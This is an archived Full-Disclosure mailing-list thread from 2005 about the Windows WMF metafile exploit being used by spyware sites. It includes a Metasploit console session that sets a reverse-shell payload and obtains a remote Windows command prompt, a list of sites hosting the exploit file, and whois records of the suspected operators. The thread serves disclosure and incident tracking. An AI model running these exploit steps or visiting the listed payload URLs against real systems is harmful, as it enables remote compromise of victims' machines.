<<< Date Index >>>     <<< Thread Index >>>

RE: [Full-disclosure] Someone wasted a nice bug on spyware...



Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I
sent it to Microsoft a few days ago and they're looking into it. It looks
like it's going to be a bad week at MSRC :(

I whoised the owners of a couple domains who host the image and got the
following information:

Domain Name:                                 BEEHAPPYY.BIZ
Domain ID:                                   D9564716-BIZ
Sponsoring Registrar:                        ONLINENIC, INC. D/B/A
CHINA-CHANNEL.COM
Sponsoring Registrar IANA ID:                82
Domain Status:                               ok
Registrant ID:                               OLNIC_919328_0_0
Registrant Name:                             Mikhail Sergeevich Gorbachev
Registrant Organization:                     Mikhail Sergeevich Gorbachev
Registrant Address1:                         Krasnaya ploshad, 1
Registrant City:                             Moscow
Registrant State/Province:                   Moscow
Registrant Postal Code:                      176098
Registrant Country:                          Russian Federation
Registrant Country Code:                     RU
Registrant Phone Number:                     +7.0957643453
Registrant Facsimile Number:                 +7.0957643453
Registrant Email:                            mail@xxxxxxxxxxxx
Administrative Contact ID:                   OLNIC_919328_1_0
Administrative Contact Name:                 Mikhail Sergeevich Gorbachev
Administrative Contact Organization:         Mikhail Sergeevich Gorbachev
Administrative Contact Address1:             Krasnaya ploshad, 1
Administrative Contact City:                 Moscow
Administrative Contact State/Province:       Moscow
Administrative Contact Postal Code:          176098
Administrative Contact Country:              Russian Federation
Administrative Contact Country Code:         RU
Administrative Contact Phone Number:         +7.0957643453
Administrative Contact Facsimile Number:     +7.0957643453
Administrative Contact Email:                mail@xxxxxxxxxxxx
Billing Contact ID:                          OLNIC_919328_3_0
Billing Contact Name:                        Mikhail Sergeevich Gorbachev
Billing Contact Organization:                Mikhail Sergeevich Gorbachev
Billing Contact Address1:                    Krasnaya ploshad, 1
Billing Contact City:                        Moscow
Billing Contact State/Province:              Moscow
Billing Contact Postal Code:                 176098
Billing Contact Country:                     Russian Federation
Billing Contact Country Code:                RU
Billing Contact Phone Number:                +7.0957643453
Billing Contact Facsimile Number:            +7.0957643453
Billing Contact Email:                       mail@xxxxxxxxxxxx
Technical Contact ID:                        OLNIC_919328_2_0
Technical Contact Name:                      Mikhail Sergeevich Gorbachev
Technical Contact Organization:              Mikhail Sergeevich Gorbachev
Technical Contact Address1:                  Krasnaya ploshad, 1
Technical Contact City:                      Moscow
Technical Contact State/Province:            Moscow
Technical Contact Postal Code:               176098
Technical Contact Country:                   Russian Federation
Technical Contact Country Code:              RU
Technical Contact Phone Number:              +7.0957643453
Technical Contact Facsimile Number:          +7.0957643453
Technical Contact Email:                     mail@xxxxxxxxxxxx
Name Server:                                 NS1.PERLINK.BIZ
Name Server:                                 NS2.PERLINK.BIZ
Created by Registrar:                        ONLINENIC, INC. D/B/A
CHINA-CHANNEL.COM
Last Updated by Registrar:                   ONLINENIC, INC. D/B/A
CHINA-CHANNEL.COM
Domain Registration Date:                    Tue Apr 26 15:43:16 GMT 2005
Domain Expiration Date:                      Wed Apr 25 23:59:59 GMT 2007
Domain Last Updated Date:                    Thu Aug 11 02:33:14 GMT 2005


The name Mikhail Sergeevich Gorbachev that this domain is registered to
leads me to believe that it is registered with false information (for those
of you who don't know, Gorbachev was a former Soviet president).


Domain Name:                                 BUYTOOLBAR.BIZ
Domain ID:                                   D11475548-BIZ
Sponsoring Registrar:                        TLDS INC.
Sponsoring Registrar IANA ID:                320
Domain Status:                               clientTransferProhibited
Registrant ID:                               6464084-SRSPLUS
Registrant Name:                             Ezhi Brozkevitsh
Registrant Organization:                     Ezhi Brozkevitsh
Registrant Address1:                         Al. Armii Ludowej 24
Registrant City:                             Warszawa
Registrant Postal Code:                      00-609
Registrant Country:                          Poland
Registrant Country Code:                     PL
Registrant Phone Number:                     +21.225798400
Registrant Email:                            admin@xxxxxxxxxxxx
Administrative Contact ID:                   6464085-SRSPLUS
Administrative Contact Name:                 Ezhi Brozkevitsh
Administrative Contact Organization:         Ezhi Brozkevitsh
Administrative Contact Address1:             Al. Armii Ludowej 24
Administrative Contact City:                 Warszawa
Administrative Contact Postal Code:          00-609
Administrative Contact Country:              Poland
Administrative Contact Country Code:         PL
Administrative Contact Phone Number:         +21.225798400
Administrative Contact Email:                admin@xxxxxxxxxxxx
Billing Contact ID:                          6464085-SRSPLUS
Billing Contact Name:                        Ezhi Brozkevitsh
Billing Contact Organization:                Ezhi Brozkevitsh
Billing Contact Address1:                    Al. Armii Ludowej 24
Billing Contact City:                        Warszawa
Billing Contact Postal Code:                 00-609
Billing Contact Country:                     Poland
Billing Contact Country Code:                PL
Billing Contact Phone Number:                +21.225798400
Billing Contact Email:                       admin@xxxxxxxxxxxx
Technical Contact ID:                        6464086-SRSPLUS
Technical Contact Name:                      Ezhi Brozkevitsh
Technical Contact Organization:              Ezhi Brozkevitsh
Technical Contact Address1:                  Al. Armii Ludowej 24
Technical Contact City:                      Warszawa
Technical Contact Postal Code:               00-609
Technical Contact Country:                   Poland
Technical Contact Country Code:              PL
Technical Contact Phone Number:              +21.225798400
Technical Contact Email:                     admin@xxxxxxxxxxxx
Name Server:                                 NS1.BUYTOOLBAR.BIZ
Name Server:                                 NS2.BUYTOOLBAR.BIZ
Created by Registrar:                        TLDS INC.
Last Updated by Registrar:                   TLDS INC.
Domain Registration Date:                    Mon Nov 14 08:00:27 GMT 2005
Domain Expiration Date:                      Mon Nov 13 23:59:59 GMT 2006
Domain Last Updated Date:                    Mon Nov 14 11:16:52 GMT 2005

This information does look promising. Iframeurl.biz is also registered to
the same individual. Perhaps the Polish authorities could apprehend this
culprit (either that, or a Polish reader of full-disclosure could pay him a
visit ;). That is, of course, assuming he is stupid enough to use his real
name to register a domain for illegal use. 


Regards,
Paul
Greyhats Security
http://greyhatsecurity.org




-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Eric Sites
Sent: Tuesday, December 27, 2005 11:02 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware...

We are seeing a lot of website picking this exploit up.

Examples: DON'T CLICK

Crackz.ws
unionseek.com/d/t1/wmf_exp.htm
beehappyy.biz/parthner3/xpl.wmf
http://www.tfcco.com/xpl.wmf
Iframeurl.biz

Cheers,

Eric Sites 
VP of Research & Development
Sunbelt Software

email: eric@xxxxxxxxxxxxxxxxxxxx 
Voice: 1-727-562-0101 x 276
Cell: 1-727-637-2414
Fax: 1-727-562-5199
Web: http://www.sunbelt-software.com
Physical Address:
101 N Garden Ave, 
Suite 120
Clearwater, FL, 33755
United States

-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of H D
Moore
Sent: Tuesday, December 27, 2005 10:57 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Someone wasted a nice bug on spyware...

In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to

test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metaf
ile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  


On Tuesday 27 December 2005 14:20, noemailpls@xxxxxxxxxxxxx wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-- 
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.1.371 / Virus Database: 267.14.8/215 - Release Date: 12/27/2005
 

-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.371 / Virus Database: 267.14.8/215 - Release Date: 12/27/2005